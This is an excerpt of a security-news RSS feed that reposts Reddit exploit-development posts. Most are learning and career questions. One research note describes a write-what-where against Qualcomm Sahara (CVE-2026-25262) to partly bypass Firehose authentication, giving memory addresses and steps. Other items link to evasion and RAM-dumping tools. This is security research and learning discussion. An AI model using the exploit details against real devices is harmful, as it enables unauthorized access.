<pubDate>Thu, 09 Jul 2026 04:03:26 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I'm not sure if anybody else has noticed this, but when I decompiling .NET binaries and look into a function in DNSPY and set a breakpoint on the return instruction and then step one instruction once the breakpoint is hit. Instead of returning me to where the function was called, it returns me to some internal function. This doesn't just happen with one function, this happens to multiple. How does this happen?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/linux4117"> /u/linux4117 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umjmw6/why_do_functions_net_not_return_at_expected/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umjmw6/why_do_functions_net_not_return_at_expected/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Advice needed!!!!!!]]></title>
<description><![CDATA[Hey everyone,I recently started learning reverse engineering and binary exploitation. Right now, I am studying through the CS365 modules on pwn.college, I currently have a lot of free time and want to make the most of it. Besides working through pwn.college, what other resources, topics, or skill...]]></description>
<link>https://tsecurity.de/de/3655772/it+sicherheit/malware+trojaner+viren/advice+needed/</link>
<pubDate>Thu, 09 Jul 2026 04:03:25 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey everyone,I recently started learning reverse engineering and binary exploitation. Right now, I am studying through the CS365 modules on <a href="http://pwn.college/">pwn.college</a>, I currently have a lot of free time and want to make the most of it. Besides working through <a href="http://pwn.college/">pwn.college</a>, what other resources, topics, or skills would you recommend learning alongside it?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Any_Department6550"> /u/Any_Department6550 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umkgjc/advice_needed/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umkgjc/advice_needed/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[I built an open-source Chromium fork that compiles fingerprint spoofing into the C++ instead of injecting JS]]></title>
<description><![CDATA[submitted by    /u/Flat_Telephone_4636   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655771/it+sicherheit/malware+trojaner+viren/i+built+an+open-source+chromium+fork+that+compiles+fingerprint+spoofing+into+the+c+instead+of+injecting+js/</link>
<pubDate>Thu, 09 Jul 2026 04:03:24 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1umqql9/i_built_an_opensource_chromium_fork_that_compiles/"> <img src="https://external-preview.redd.it/rxQKIDfvWBbcXLQQCDWj9SjFPjPwt_qxFOAN5SSoCGY.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=68b030def89151674b0ad49cb8ff1999098ffe27" alt="I built an open-source Chromium fork that compiles fingerprint spoofing into the C++ instead of injecting JS" title="I built an open-source Chromium fork that compiles fingerprint spoofing into the C++ instead of injecting JS"> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/Flat_Telephone_4636"> /u/Flat_Telephone_4636 </a> <br> <span><a href="https://github.com/tiliondev/fortress">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umqql9/i_built_an_opensource_chromium_fork_that_compiles/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best way to decompile and analyze a large Java EE application (.ear / .jar)?]]></title>
<description><![CDATA[I have a local copy of a large enterprise Java application (a .ear archive containing multiple .jar files, thousands of .class files). I need to understand how a specific part of the business logic works by reading the decompiled source. What's the best modern approach/toolchain for this in 2026?...]]></description>
<link>https://tsecurity.de/de/3655770/it+sicherheit/malware+trojaner+viren/best+way+to+decompile+and+analyze+a+large+java+ee+application+ear+jar/</link>
<pubDate>Thu, 09 Jul 2026 04:03:23 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I have a local copy of a large enterprise Java application<br> (a .ear archive containing multiple .jar files, thousands<br> of .class files). I need to understand how a specific<br> part of the business logic works by reading the decompiled<br> source.</p> <p>What's the best modern approach/toolchain for this in 2026?</p> <p>- Which decompiler gives the most readable output for<br> large/complex codebases? (I've heard of JADX, Vineflower,<br> CFR, Procyon — which would you recommend?)<br> - Any good way to navigate and trace call flows across<br> thousands of classes once decompiled?<br> - Tips for dealing with obfuscated or hard-to-read<br> decompiled sections?</p> <p>I have legitimate access to the software (it's for<br> interoperability analysis). Just looking for the most<br> efficient workflow. Thanks!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/EPM_Finance"> /u/EPM_Finance </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umt9q7/best_way_to_decompile_and_analyze_a_large_java_ee/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umt9q7/best_way_to_decompile_and_analyze_a_large_java_ee/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best way to decompile and analyze a large Java EE application (.ear / .jar)?]]></title>
<description><![CDATA[I have a local copy of a large enterprise Java application (a .ear archive containing multiple .jar files, thousands of .class files). I need to understand how a specific part of the business logic works by reading the decompiled source. What's the best modern approach/toolchain for this in 2026?...]]></description>
<link>https://tsecurity.de/de/3655769/it+sicherheit/malware+trojaner+viren/best+way+to+decompile+and+analyze+a+large+java+ee+application+ear+jar/</link>
<pubDate>Thu, 09 Jul 2026 04:03:21 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I have a local copy of a large enterprise Java application<br> (a .ear archive containing multiple .jar files, thousands<br> of .class files). I need to understand how a specific<br> part of the business logic works by reading the decompiled<br> source.</p> <p>What's the best modern approach/toolchain for this in 2026?</p> <p>- Which decompiler gives the most readable output for<br> large/complex codebases? (I've heard of JADX, Vineflower,<br> CFR, Procyon — which would you recommend?)<br> - Any good way to navigate and trace call flows across<br> thousands of classes once decompiled?<br> - Tips for dealing with obfuscated or hard-to-read<br> decompiled sections?</p> <p>I have legitimate access to the software (it's for<br> interoperability analysis). Just looking for the most<br> efficient workflow. Thanks!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/EPM_Finance"> /u/EPM_Finance </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umtaxk/best_way_to_decompile_and_analyze_a_large_java_ee/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umtaxk/best_way_to_decompile_and_analyze_a_large_java_ee/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[I built an open-source Chromium fork that compiles fingerprint spoofing into the C++ instead of injecting JS]]></title>
<description><![CDATA[submitted by    /u/Flat_Telephone_4636   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655768/it+sicherheit/malware+trojaner+viren/i+built+an+open-source+chromium+fork+that+compiles+fingerprint+spoofing+into+the+c+instead+of+injecting+js/</link>
<pubDate>Thu, 09 Jul 2026 04:03:20 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/Flat_Telephone_4636"> /u/Flat_Telephone_4636 </a> <br> <span><a href="https://v.redd.it/a4hymlhej4bh1">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1umxexe/i_built_an_opensource_chromium_fork_that_compiles/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[heap pwn 學習]]></title>
<description><![CDATA[i want to know any good material to learn heap pwn. i am an osce3 which familiar with stack on windows and unix a few years.  and also spent a year on heap, can do general heap pwn technique like uaf, double free, off by one, chunk faking, unlink, heap fengshui etc. i need to do more practices on...]]></description>
<link>https://tsecurity.de/de/3655767/it+sicherheit/malware+trojaner+viren/heap+pwn/</link>
<pubDate>Thu, 09 Jul 2026 04:03:19 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>i want to know any good material to learn heap pwn. i am an osce3 which familiar with stack on windows and unix a few years. </p> <p>and also spent a year on heap, can do general heap pwn technique like uaf, double free, off by one, chunk faking, unlink, heap fengshui etc. i need to do more practices on heap and get more experiences on the houses. any good resources?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/cck00"> /u/cck00 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1un7kxn/heap_pwn_%E5%AD%B8%E7%BF%92/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1un7kxn/heap_pwn_%E5%AD%B8%E7%BF%92/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[BareMetal RAM Dumper — Bare-metal x86 tool for Cold Boot Attack experiments]]></title>
<description><![CDATA[submitted by    /u/Primary_Air5604   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655766/it+sicherheit/malware+trojaner+viren/baremetal+ram+dumper+-+bare-metal+x86+tool+for+cold+boot+attack+experiments/</link>
<pubDate>Thu, 09 Jul 2026 04:03:18 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1uni6zd/baremetal_ram_dumper_baremetal_x86_tool_for_cold/"> <img src="https://external-preview.redd.it/2pZwRHj1u0dJOzYtnEjhFny2lD9fmkasNJ3c1o2rbhQ.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=aad14ab13fa360d8487b54f1caf62f72f05fef80" alt="BareMetal RAM Dumper — Bare-metal x86 tool for Cold Boot Attack experiments" title="BareMetal RAM Dumper — Bare-metal x86 tool for Cold Boot Attack experiments"> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/Primary_Air5604"> /u/Primary_Air5604 </a> <br> <span><a href="https://github.com/pIat0n/BareMetal-RAM-Dumper">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uni6zd/baremetal_ram_dumper_baremetal_x86_tool_for_cold/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[Planning on career shift]]></title>
<description><![CDATA[Is offsec Exp-301 worth the investment? What is the future career path for exploit development?     submitted by    /u/Double_Loan_6261   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655765/it+sicherheit/malware+trojaner+viren/planning+on+career+shift/</link>
<pubDate>Thu, 09 Jul 2026 04:03:17 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Is offsec Exp-301 worth the investment? What is the future career path for exploit development? </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Double_Loan_6261"> /u/Double_Loan_6261 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uo1p6m/planning_on_career_shift/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uo1p6m/planning_on_career_shift/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Question to Hackers regarding architecture change in processor. And graph creation for data request and receive checks.]]></title>
<description><![CDATA[So, I will divide the question in two parts:  For exploitation via web if chip designers adds certain tag bits to incoming requests that's whatever coming via web or network stack we assign a certain tag say 01 for now. Next if anyone trying to execute XSS and locate where change is occurring by ...]]></description>
<link>https://tsecurity.de/de/3655764/it+sicherheit/malware+trojaner+viren/question+to+hackers+regarding+architecture+change+in+processor+and+graph+creation+for+data+request+and+receive+checks/</link>
<pubDate>Thu, 09 Jul 2026 04:03:16 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>So, I will divide the question in two parts:</p> <ol> <li><p>For exploitation via web if chip designers adds certain tag bits to incoming requests that's whatever coming via web or network stack we assign a certain tag say 01 for now. Next if anyone trying to execute XSS and locate where change is occurring by the tag bits, whether if the requests are for persistent or its generating or modifying code. Then identification of sending unrelated data to the site can we omit the whole processes just by introducing tag bits to the antenna protocols? That is just building the chip with some more bits.</p></li> <li><p>That was for web say the app is in computer, then it would first ask for the app wants to change some parts of OS. Instead we just do some basic prevention method number 1 not let writing in the particular section of memory that is hard disc, next switch off means switch off no background running. Number 3 the apps which are not built in just remove there maintain connection after every switch on. Only let the system files to maintain connection which again have unique tag bits to maintain.</p></li> </ol> <p>Third and last one why not we make a graph behind which processes writing to which files and which process is sending system data in intervals? This can solve two things one if distributed writing in buffer is done it could be found out. Another if sending just on the flow no storage then graph would check the path of pattern of sending and block. Though if someone sends to other server and those servers later merge them i do not how to stop that.</p> <p>Lastly just beginner in this spot the curious mind is asking questions would like to know in details please.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Civil-Art1907"> /u/Civil-Art1907 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1up162d/question_to_hackers_regarding_architecture_change/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1up162d/question_to_hackers_regarding_architecture_change/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[How do I learn malware development??]]></title>
<description><![CDATA[submitted by    /u/marlinspikee   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655763/it+sicherheit/malware+trojaner+viren/how+do+i+learn+malware+development/</link>
<pubDate>Thu, 09 Jul 2026 04:03:14 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/marlinspikee"> /u/marlinspikee </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1up4110/how_do_i_learn_malware_development/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1up4110/how_do_i_learn_malware_development/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[MSVC optimization]]></title>
<description><![CDATA[I am learning reverse engineering on Windows applications such as Adobe, Foxit PDF, and Steam, and I noticed that I waste a very large amount of time trying to understand something that I should not focus on. I started noticing strange and confusing patterns in the assembly and the C code generat...]]></description>
<link>https://tsecurity.de/de/3655762/it+sicherheit/malware+trojaner+viren/msvc+optimization/</link>
<pubDate>Thu, 09 Jul 2026 04:03:13 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I am learning reverse engineering on Windows applications such as Adobe, Foxit PDF, and Steam, and I noticed that I waste a very large amount of time trying to understand something that I should not focus on.</p> <p>I started noticing strange and confusing patterns in the assembly and the C code generated by IDA, and when I try to understand some functions, I feel that the function has no meaning.</p> <p>When I searched, I found that this topic is related to the compiler and compiler optimizations. However, I could not find many articles or discussions about the compiler topic in reverse engineering.</p> <p>So I started experimenting and trying, but every time I fail and cannot reach a solution or understanding.</p> <p>Apart from the fact that reverse engineering a C++ program is already a difficult task.</p> <p>If there is someone who has faced the same problem and found a solution, I would like to know. It is not a problem itself; it is a pattern or a way of thinking used by the compiler. I need to understand how the compiler generates these patterns.</p> <p>I want someone to suggest books, articles, courses, or anything that can help me understand the MSVC compiler, how it generates patterns, and how to understand the behavior and logic of a function after compiler optimization.</p> <p>I hope I explained my question correctly.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/No-Meeting-153"> /u/No-Meeting-153 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uph2v9/msvc_optimization/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uph2v9/msvc_optimization/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Call Stack Spoofing via Runtime .pdata (Evade RtlVirtualUnwind)]]></title>
<description><![CDATA[submitted by    /u/Important_Map6928   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655761/it+sicherheit/malware+trojaner+viren/call+stack+spoofing+via+runtime+pdata+evade+rtlvirtualunwind/</link>
<pubDate>Thu, 09 Jul 2026 04:03:12 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1uprx2r/call_stack_spoofing_via_runtime_pdata_evade/"> <img src="https://external-preview.redd.it/oLtrS0vFTRXf3w0QMGdNxlELEejII951Y2ynqexAzHU.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=67a7c2994da919437058a7e8bfd87779a817c182" alt="Call Stack Spoofing via Runtime .pdata (Evade RtlVirtualUnwind)" title="Call Stack Spoofing via Runtime .pdata (Evade RtlVirtualUnwind)"> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/Important_Map6928"> /u/Important_Map6928 </a> <br> <span><a href="https://sibouzitoun.tech/articles/sindrikit-v1o3/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uprx2r/call_stack_spoofing_via_runtime_pdata_evade/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[i need to learn radare2 form scratch..! to play with memory address and make it leak..! but i cant able to give the correct road map to learn that its confusing..help me with that...]]></title>
<description><![CDATA[i need to learn radare2 form scratch..! to play with memory address and make it leak..! but i cant able to give the correct road map to learn that its confusing..help me with that...    submitted by    /u/Mean_Parsnip_3007   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655760/it+sicherheit/malware+trojaner+viren/i+need+to+learn+radare2+form+scratch+to+play+with+memory+address+and+make+it+leak+but+i+cant+able+to+give+the+correct+road+map+to+learn+that+its+confusinghelp+me+with+that/</link>
<pubDate>Thu, 09 Jul 2026 04:03:11 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>i need to learn radare2 form scratch..! to play with memory address and make it leak..! but i cant able to give the correct road map to learn that its confusing..help me with that...</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Mean_Parsnip_3007"> /u/Mean_Parsnip_3007 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqkeq8/i_need_to_learn_radare2_form_scratch_to_play_with/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqkeq8/i_need_to_learn_radare2_form_scratch_to_play_with/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Just a reminder about a12/13 exploits on the bootrom]]></title>
<description><![CDATA[So there is exploits called usbliter8 for a12 devices,There was a few pop ups about videos how to do it and what it can [do.Be](http://do.Be) informed and do your research    submitted by    /u/dablakmark8   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655759/it+sicherheit/malware+trojaner+viren/just+a+reminder+about+a1213+exploits+on+the+bootrom/</link>
<pubDate>Thu, 09 Jul 2026 04:03:09 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>So there is exploits called usbliter8 for a12 devices,There was a few pop ups about videos how to do it and what it can [do.Be](<a href="http://do.be/">http://do.Be</a>) informed and do your research</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/dablakmark8"> /u/dablakmark8 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqm2h2/just_a_reminder_about_a1213_exploits_on_the/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqm2h2/just_a_reminder_about_a1213_exploits_on_the/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build malwear sandbox]]></title>
<description><![CDATA[It worth building malware sandbox from scratch (with c) to get into malware analysis? Or just use tools?    submitted by    /u/cdtrmnbaell   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655758/it+sicherheit/malware+trojaner+viren/build+malwear+sandbox/</link>
<pubDate>Thu, 09 Jul 2026 04:03:08 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>It worth building malware sandbox from scratch (with c) to get into malware analysis? Or just use tools?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/cdtrmnbaell"> /u/cdtrmnbaell </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uqm5el/build_malwear_sandbox/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uqm5el/build_malwear_sandbox/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Need help get out tutorial hell. Develop pwn CTF skills, build a foundation in Vuln Exploit, RE, etc]]></title>
<description><![CDATA[Hi guys, recently Im in a loop, hop on and off different site different courses in and out, back and forth while feeling making ZERO progress.  Here, I want to share a bit about my goal, my background, my problem. And I hope I could have some advices to get out of this feeling MY GOAL: - Long ter...]]></description>
<link>https://tsecurity.de/de/3655757/it+sicherheit/malware+trojaner+viren/need+help+get+out+tutorial+hell+develop+pwn+ctf+skills+build+a+foundation+in+vuln+exploit+re+etc/</link>
<pubDate>Thu, 09 Jul 2026 04:03:07 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi guys, recently Im in a loop, hop on and off different site different courses in and out, back and forth while feeling making ZERO progress. </p> <p>Here, I want to share a bit about my goal, my background, my problem. And I hope I could have some advices to get out of this feeling</p> <p><strong>M</strong><strong>Y GOAL:</strong><br> - Long term: Get into cybersecurity field, especially roles that involve “low level” stuffs as I really interested in them. Thats it! For now, as Im pretty new to this + Im hyper focus on short term goal which I will talk right after<br> - Short term goal: Build foundation, knowledge, skills in Reverse Engineering (RE) and more excitingly Binary Exploitation, Pwn<br> - Shorter term goal: To prepare for upcoming CTF contests with my new team. More on this later </p> <p><strong>MY BACKGROUND:</strong><br> - I already familiar with Linux, CLI, some popular commands<br> - I know x86 assembly<br> - know C, C++<br> - know on surface level some basic vulnerabilities and have done very simple CTF challenges (ret2win, shellcode easy, …)<br> - do know how to use basic gdb, pwntools, ida/ghidra</p> <p>all of that is a result of following pwn.college + using Linux as daily basis + my college’s teaching on c, c++, etc</p> <p>by all means, I do not master any of these above skills I told. </p> <p><strong>MY PROBLEMS:</strong><br> So ofc Im very worrying the most about the upcoming CTF because Im new and feel like know nothing yet.<br> I also stucking into tutorial hell as I have too many resources of documentation/courses that I do not know which one is suit for my current situation </p> <p>Im aware of the pinning post in this sub, that is actually where I get these resources from</p> <p>But with 2 months left until the contest, I really want to make the most out of my time. So I need help with designing a road map so to speak.</p> <p>Currently, Im looking into ironstone’s pwn notes + Nightmare CTF collection. Whatd you recommend? </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/minhincs"> /u/minhincs </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqpb3o/need_help_get_out_tutorial_hell_develop_pwn_ctf/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqpb3o/need_help_get_out_tutorial_hell_develop_pwn_ctf/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-25262 Write-What-Where in Qualcomm Sahara confirmed on Snapdragon 8 Gen 1 (SM8450) – partial Firehose auth bypass]]></title>
<description><![CDATA[I’d like to share the results of an experimental research note on the applicability of CVE-2026-25262 (Kaspersky ICS CERT, May 2026) to a modern 64-bit ARMv9 Qualcomm platform. **Device:** POCO F4 GT (ingres) / Snapdragon 8 Gen 1 (SM8450, Waipio). **What was done:** - Static analysis of the engin...]]></description>
<link>https://tsecurity.de/de/3655756/it+sicherheit/malware+trojaner+viren/cve-2026-25262+write-what-where+in+qualcomm+sahara+confirmed+on+snapdragon+8+gen+1+sm8450+-+partial+firehose+auth+bypass/</link>
<pubDate>Thu, 09 Jul 2026 04:03:06 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I’d like to share the results of an experimental research note on the applicability of CVE-2026-25262 (Kaspersky ICS CERT, May 2026) to a modern 64-bit ARMv9 Qualcomm platform.</p> <p>**Device:** POCO F4 GT (ingres) / Snapdragon 8 Gen 1 (SM8450, Waipio).</p> <p>**What was done:**</p> <p>- Static analysis of the engineering Firehose loader (`xbl_s_devprg_ns.melf`) in Ghidra identified the authorization state structure at `0x6B9CD500` (critical field `0x6B9CD538`).</p> <p>- A modified Sahara client (`cve_final_single`, based on B. Kerler's edl) was created to exploit the CVE and deliver the loader to an arbitrary SRAM address (`0x2211C000`) *without* signature verification.</p> <p>- An additional `SAHARA_CMD_RECV_DATA` packet injected the value `5` into the `is_authenticated` field before control was transferred to Firehose.</p> <p>**Result (partial success):**</p> <p>- Arbitrary write to SRAM via CVE-2026-25262 is **confirmed working** on SM8450.</p> <p>- The loader executes and responds to commands (`nop` succeeds), no authorization error is observed.</p> <p>- Full UFS access is **not yet achieved**; `getstorageinfo` and `read` return empty responses. Two hypotheses are being investigated: (1) loading only the LOAD segments without ELF/certificate overlay, and (2) potential TrustZone/SMC dependencies.</p> <p>**Why this might be interesting:**</p> <p>The official Qualcomm list for CVE-2026-25262 includes only 32-bit legacy platforms. This experiment suggests that the vulnerable code path in the Boot ROM is also present on the latest flagship SoCs, widening the scope of the vulnerability.</p> <p>Full article, logs, PBL status codes, and static analysis notes are available in the repository:</p> <p><a href="https://github.com/shurikgo/cve-2026-25262-sm8450-research">https://github.com/shurikgo/cve-2026-25262-sm8450-research</a></p> <p>No full exploit code is provided; the published material is sufficient for independent verification and further research.</p> <p>*This work is shared for educational and research purposes only.*</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Asleep_Building_6669"> /u/Asleep_Building_6669 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqqcst/cve202625262_writewhatwhere_in_qualcomm_sahara/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqqcst/cve202625262_writewhatwhere_in_qualcomm_sahara/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Using a Single Variable to Gain a Controlled Write]]></title>
<description><![CDATA[This week we'll be looking at another beginner friendly exploit development tutorial! More specifically we'll be looking at the "passcode" binary exploitation challenge hosted on pwnable[.]kr!  This challenge covers multiple skills so I believe regardless of where you are on you journey to learn ...]]></description>
<link>https://tsecurity.de/de/3655755/it+sicherheit/malware+trojaner+viren/using+a+single+variable+to+gain+a+controlled+write/</link>
<pubDate>Thu, 09 Jul 2026 04:03:05 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>This week we'll be looking at another beginner friendly exploit development tutorial! More specifically we'll be looking at the "passcode" binary exploitation challenge hosted on pwnable[.]kr! </p> <p>This challenge covers multiple skills so I believe regardless of where you are on you journey to learn exploit development you will pick up a few things! </p> <p>By the end of this tutorial you should have gained exposure to: </p> <p>- C source code review<br> - Leveraging a controlled write to gain code execution through the use of one variable<br> - Abusing binaries compiled without PIE (Also known as ASLR)<br> - Debugging<br> - Using python exploit code alongside GDB </p> <p>and more! Since this is binary exploitation do not feel discouraged if everything does not click! The goal is to learn at least one thing from every tutorial!</p> <p>You can find the full video below:</p> <p><a href="https://youtu.be/cpol2KPSPaw?si=NSnjgDGBcNF-x8E8">https://youtu.be/cpol2KPSPaw?si=NSnjgDGBcNF-x8E8</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/AdvisorPowerful9769"> /u/AdvisorPowerful9769 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqt244/using_a_single_variable_to_gain_a_controlled_write/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqt244/using_a_single_variable_to_gain_a_controlled_write/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[PE structural validation notes (delay-load, exports, VS_VERSIONINFO) + IOCX v0.7.5 release]]></title>
<description><![CDATA[Publishing a release of IOCX (open-source PE structural validator, MPL-2.0) and posting some format-level notes alongside it. Write-up: PE structural validation: format ambiguities and decoder design The notes catalogue four categories of PE specification ambiguity encountered during decoder work...]]></description>
<link>https://tsecurity.de/de/3655754/it+sicherheit/malware+trojaner+viren/pe+structural+validation+notes+delay-load+exports+vsversioninfo+iocx+v075+release/</link>
<pubDate>Thu, 09 Jul 2026 04:03:03 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
